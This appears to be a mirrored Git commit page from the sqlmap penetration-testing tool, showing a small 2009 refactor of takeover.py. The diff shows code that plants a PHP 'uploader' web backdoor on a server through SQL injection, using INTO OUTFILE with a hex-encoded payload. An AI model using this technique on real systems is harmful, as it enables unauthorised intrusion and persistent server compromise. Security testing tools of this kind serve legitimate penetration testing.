PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-07 05:01:30 +00:00
Code Issues Projects Releases Wiki Activity

Minor syntax adjustment for web backdoor functionality

Browse Source
This commit is contained in:
Bernardo Damele
2009-04-28 21:51:22 +00:00
parent 58f3eee390
commit 57b8bb4c8e
2 changed files with 4 additions and 9 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
plugins/generic/takeover.py
View File

@@ -137,14 +137,9 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
uploaderName = "uploader.php"
uploaderStr = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
if kb.os == "Windows":
sep = "\\\\"
else:
sep = "/"
for directory in directories:
# Upload the uploader agent
outFile = os.path.normpath("%s%s%s" % (directory, sep, uploaderName))
outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
uplQuery = uploaderStr.replace("WRITABLE_DIR", directory)
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)